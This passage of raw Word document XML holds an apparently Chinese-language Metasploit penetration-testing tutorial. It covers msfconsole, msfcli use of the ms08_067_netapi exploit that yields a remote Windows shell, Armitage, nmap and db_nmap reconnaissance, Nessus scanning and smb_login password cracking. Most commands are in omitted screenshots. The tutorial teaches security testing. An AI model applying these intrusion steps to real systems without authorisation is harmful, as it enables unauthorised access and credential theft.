        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>监听器（Listener）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit中用来等待连入网络连接的组件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit用户接口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括终端、命令行和图形化界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>sf终端</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架中最流行、最灵活、功能最丰富、支持最好的工具之一，能够访问Metasploit框架中几乎每一个选项和配置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSF终端</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">： </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接命令行输入</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">msfconsole </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DD402C1" wp14:editId="697A62BA">
            <wp:extent cx="5274310" cy="2599055"/>
            <wp:effectExtent l="0" t="0" r="2540"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a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sf终端的命令集在各个版本中基本稳定，如果想了解某个命令的用法，直接help+命令名就行了，比如msf</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> connect</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就能查看connect命令的帮助文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Msf命令行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相对于msfconsole对用户更友好的交互方式，msfcli主要考虑脚本处理和其他命令行工具的互操作性，比如，msfcli可以直接从命令行shell执行并允许将其他工具的输出重定向到msfcli或者将msfcli的输出重定向到其他命令行工具，此外它同样也支持启动渗透攻击和辅助模块，这样在你明确知道要使用的渗透攻击模块和所需要的配置参数时使用msfcli效率能提高很多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用msfcli</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h能查看基本的帮助文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="172A77C1" wp14:editId="5340D618">
            <wp:extent cx="4638095" cy="286666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8095" cy="2866667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果不知道如何输入命令参数时，可以在输入的字符串命令后加上一个字符“O”，就可以看到模块中所提供的配置参数，下图就使用“O”查看了ms08_067_netapi模块的配置参数选项。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79622C49" wp14:editId="4649D6FE">
            <wp:extent cx="5274310" cy="1845310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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1845310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到这个模块需要3个配置选项：RHOST、RPORT和SMPIPE，之后再加上字符“P”就能检查可用的攻击载荷。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C9AC76" wp14:editId="68E9EAB4">
            <wp:extent cx="5274310" cy="128079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280795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在设置完所有必须的配置选项并选择了一个攻击载荷之后，就可以在msfcli命令参数字符串最后加上字符“E”，来运行渗透测试代码，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="00EB06B9" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB06B9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70DDF24D" wp14:editId="0DA557EE">
            <wp:extent cx="5274310" cy="20066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006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击成功，我们拿到了远程windows主机的shell窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="00AA7369" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7369">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Armitage图形化用户接口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit框架中的armitage组件是一个完全交互式的图形化用户接口，具有丰富的功能且免费。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行Armitage：直接shell下执行armitage，在启动过程中选择“Start</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSF”就可以让armitage连接到Metasploit实例上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2B04EE" wp14:editId="5C68CC2A">
            <wp:extent cx="5274310" cy="1501140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="18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1501140"/>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t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>mitage</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动后，简单地点击菜单项就可以执行特定的渗透攻击或访问其他Metasploit功能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B6D5FD1" wp14:editId="6E01B8BA">
            <wp:extent cx="5274310" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18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a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc499884735"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用Metasploit实施一次渗透攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1．</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情报搜集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情报搜集包括被动信息搜集和主动信息搜集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被动信息搜集：不接触目标系统的情况下间接挖掘目标信息，可以确定网络边界情况、运维人员、网络中使用操作系统及网站服务器类型，便捷的工具有whois、nslookup、netcraft等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动信息搜集：直接与目标系统交互，深入了解确定目标开放的端口和服务，提高渗透成功的机会，常见的工具有nmap端口扫描、Metasploit内置辅助模块等，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>nmap可以作为一个第三方扫描器独立运行，也可以在Metasploit中运行</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>独立运行NMAP：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>nmap -sS -Pn 10.180.187.16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以添加-A选项进行深入的服务枚举和旗标获取，获取更多细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在MSF console中运行Nmap：可以很方便的将操作记录和结果记录在数据库中，这在大量测试目标的情况下优势很明显。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先使用init.d脚本启动postgresql和Metasploit服务：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5318B5AC" wp14:editId="75FE7C4B">
            <wp:extent cx="5274310" cy="1019810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="2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1019810"/>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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一次启动metasploit服务时会建表。启动msfconsole用db_status查看数据库连接情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EF35044" wp14:editId="175B26D5">
            <wp:extent cx="4017963" cy="561975"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="21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17963"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4056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功连接到数据库后可以执行db_nmap：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EED82F6" wp14:editId="18C5D915">
            <wp:extent cx="5274310" cy="3797300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="23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3797300"/>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t>db_hosts查看数据库已保存的host信息：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7925B991" wp14:editId="374CDFB2">
            <wp:extent cx="5274310" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="25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1226820"/>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t>-c 选项提供输出过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2E786C" wp14:editId="60CE8905">
            <wp:extent cx="5274310" cy="1963420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="25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1963420"/>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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit内建的端口扫描器，如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E6B7116" wp14:editId="2ADE44E4">
            <wp:extent cx="5274310" cy="345440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="27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345440"/>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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内建的端口扫描器在辅助进行渗透攻击方面更有优势，比如跳板攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对性的扫描：寻找目标网络中存在的已知可利用漏洞或能够轻松获取后门的特定系统、软件或配置缺陷。目的更明确，风险更小，更快速</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C05A7E2" wp14:editId="700666C2">
            <wp:extent cx="5274310" cy="974090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="27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 name="Picture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974090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描器向目标系统发送数据，并将反馈数据与自带的漏洞特征库进行匹配，进而列举出目标系统上存在的安全漏洞。也可以将不同系统独特的响应当成目标的指纹来确定OS版本，甚至补丁安装等级。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描工具：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>NeXpose、Nessus、专用漏洞扫描器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Nessus扫描报告界面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A122A1" wp14:editId="00BA4199">
            <wp:extent cx="5274310" cy="3081655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="29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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专用漏洞扫描： 在网络上查找某个特定的漏洞时，可以借助Metasploit自带的辅助模块完成，如下为两个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>借助smb_login模块对主机的登录账号进行破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04734C86" wp14:editId="564B5E29">
            <wp:extent cx="5274310" cy="1960245"/>
